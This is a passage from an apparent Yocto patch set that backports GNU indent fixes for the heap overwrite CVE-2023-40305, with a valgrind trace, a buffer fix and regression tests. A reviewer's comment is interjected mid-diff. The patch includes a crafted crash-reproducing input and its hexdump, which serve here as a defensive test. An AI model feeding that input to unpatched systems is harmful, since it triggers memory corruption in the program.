++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ */ ++ x +diff --git a/src/indent.c b/src/indent.c +index 0c2780b..208b48a 100644 +--- a/src/indent.c ++++ b/src/indent.c +@@ -145,8 +145,8 @@ static void sw_buffer(void) + parser_state_tos->search_brace = false; + bp_save = buf_ptr; + be_save = buf_end; +- buf_ptr = save_com.ptr; + need_chars (&save_com, 1); ++ buf_ptr = save_com.ptr; + buf_end = save_com.end; + save_com.end = save_com.ptr; /* make save_com empty */ + } +-- +2.35.5 diff --git a/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0002.patch b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0002.patch new file mode 100644 index 0000000000..d02521bb06 --- /dev/null +++ b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0002.patch 
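Review bot: The two-line reorder in sw_buffer() carries no comment explaining why `buf_ptr = save_com.ptr;` must follow `need_chars (&save_com, 1);`, so a later cleanup could move it back. Per the patch description, need_chars() may reallocate `save_com.ptr`, and the old order left `buf_ptr` pointing at the freed block. A line such as `/* need_chars() may realloc save_com.ptr: read the pointer only after it */` above the assignment would record that. sw_buffer() starts before the inner hunk.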
@@ -0,0 +1,4254 @@ +From 2685cc0bef0200733b634932ea7399b6cf91b6d7 Mon Sep 17 00:00:00 2001 +From: Petr Písař <ppisar@redhat.com> +Date: Thu, 19 Oct 2023 08:42:59 +0000 +Subject: [PATCH] Fix a heap buffer overwrite in search_brace() + (CVE-2023-40305) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If there was a comment between if-condition and an statement opening +bracket and the comment size aligned to an indent-internal 1024 B +buffer for comments, indent attempted to write into a nonallocated +memory on heap. + +$ hexdump -C /tmp/write1 +00000000 69 66 20 30 3b 65 6c 73 65 2f 2a 0a 0a 0a 0a 0a |if 0;else/*.....| +00000010 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a |................| +* +00000800 0a 0a 0a 0a 2a 2f 7b 0a |....*/{.| +00000808 + +$ valgrind -- ./indent -o /dev/null /tmp/write1 2>&1 | head -n 23 +==26345== Memcheck, a memory error detector +==26345== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al. +==26345== Using Valgrind-3.21.0 and LibVEX; rerun with -h for copyright info +==26345== Command: ./indent -o /dev/null /tmp/write1 +==26345== +==26345== Invalid write of size 1 +==26345== at 0x401558: search_brace (indent.c:232) +==26345== by 0x401CB2: indent_main_loop (indent.c:548) +==26345== by 0x402288: indent (indent.c:758) +==26345== by 0x402931: indent_single_file (indent.c:1003) +==26345== by 0x4029FF: indent_all (indent.c:1041) +==26345== by 0x402BA6: main (indent.c:1122) +==26345== Address 0x4aa7830 is 0 bytes after a block of size 2,048 alloc'd +==26345== at 0x4847A40: realloc (vg_replace_malloc.c:1649) +==26345== by 0x408BA1: xrealloc (globs.c:64) +==26345== by 0x40BEE4: need_chars (handletoken.c:89) +==26345== by 0x401686: search_brace (indent.c:281) +==26345== by 0x401CB2: indent_main_loop (indent.c:548) +==26345== by 0x402288: indent (indent.c:758) +==26345== by 0x402931: indent_single_file (indent.c:1003) +==26345== by 0x4029FF: indent_all (indent.c:1041) +==26345== by 
0x402BA6: main (indent.c:1122) + +The cause was that the buffer was exhausted by the comment text and no +space left for the following new-line and curly bracket characters. + +This patch fixes it by enlarging the buffer two fit these two +additional characters. + +<https://savannah.gnu.org/bugs/index.php?64503> + +Signed-off-by: Petr Písař <ppisar@redhat.com> + +CVE: CVE-2023-40305 + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/indent.git/commit/?id=2685cc0bef0200733b634932ea7399b6cf91b6d7] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + regression/TEST | 44 +- + regression/input/comment-heap-overwrite.c | 2042 ++++++++++++++++ + regression/standard/comment-heap-overwrite.c | 2044 +++++++++++++++++ + .../standard/comment-heap-overwrite.err | 1 + + src/indent.c | 1 + + 5 files changed, 4111 insertions(+), 21 deletions(-) + create mode 100644 regression/input/comment-heap-overwrite.c + create mode 100644 regression/standard/comment-heap-overwrite.c + create mode 100644 regression/standard/comment-heap-overwrite.err + +diff --git a/regression/TEST b/regression/TEST +index a7a6747..a76c112 100755 +--- a/regression/TEST ++++ b/regression/TEST +@@ -427,6 +427,7 @@ echo Testing new comment stuff...Done. + + + echo Testing bad code handling.... ++ERR=output/errors + + # print_comment() was reading past the end of the buffer... + echo -ne '/*' | $INDENT -npro -st > /dev/null 2>&1 +@@ -444,29 +445,30 @@ then + echo >> $ERR + fi + +-# This ends in a error from indent but it shouldn't coredump. +-$INDENT -npro input/bug206785.c -o output/bug206785.c 2>output/bug206785.err ++# This ends in an error from indent but it shouldn't coredump. ++for TEST in bug206785 comment-heap-overwrite; do ++ $INDENT -npro input/"$TEST".c -o output/"$TEST".c 2>output/"$TEST".err + +-if [ $? -ne 2 ] +-then +- printf ERROR: bad return status from indent. | tee -a $ERR +- echo >> $ERR +-fi +-cd output ++ if [ $? 
-ne 2 ] ++ then ++ printf "ERROR: bad return status from indent for %s.c" "$TEST" | tee -a $ERR ++ echo >> $ERR ++ fi + +-for i in bug206785.c bug206785.err +-do +- printf ...$i... +- diff --initial-tab ../standard/$i $i > $i-diffs 2>&1 +- if [ -s $i-diffs ] +- then +- printf ERROR: $i failed | tee -a $ERR +- echo >> $ERR +- else +- rm $i-diffs +- rm $i +- fi +- echo ++ for i in "$TEST".c "$TEST".err ++ do ++ printf "...%s..." "$i" ++ diff --initial-tab standard/"$i" output/"$i" > output/"$i"-diffs 2>&1 ++ if [ -s output/"$i"-diffs ] ++ then ++ printf "ERROR: %s failed" "$i" | tee -a $ERR ++ echo >> $ERR ++ else ++ rm output/"$i"-diffs ++ rm output/"$i" ++ fi ++ echo ++ done + done + + echo Testing bad code handling...Done. +diff --git a/regression/input/comment-heap-overwrite.c b/regression/input/comment-heap-overwrite.c +new file mode 100644 +index 0000000..5b1ca6a +--- /dev/null ++++ b/regression/input/comment-heap-overwrite.c +@@ -0,0 +1,2042 @@ ++if 0;else/* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++*/{ +diff --git a/regression/standard/comment-heap-overwrite.c b/regression/standard/comment-heap-overwrite.c +new file mode 100644 +index 0000000..8650d51 +--- /dev/null ++++ b/regression/standard/comment-heap-overwrite.c +@@ -0,0 +1,2044 @@ ++if 0; ++else /* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 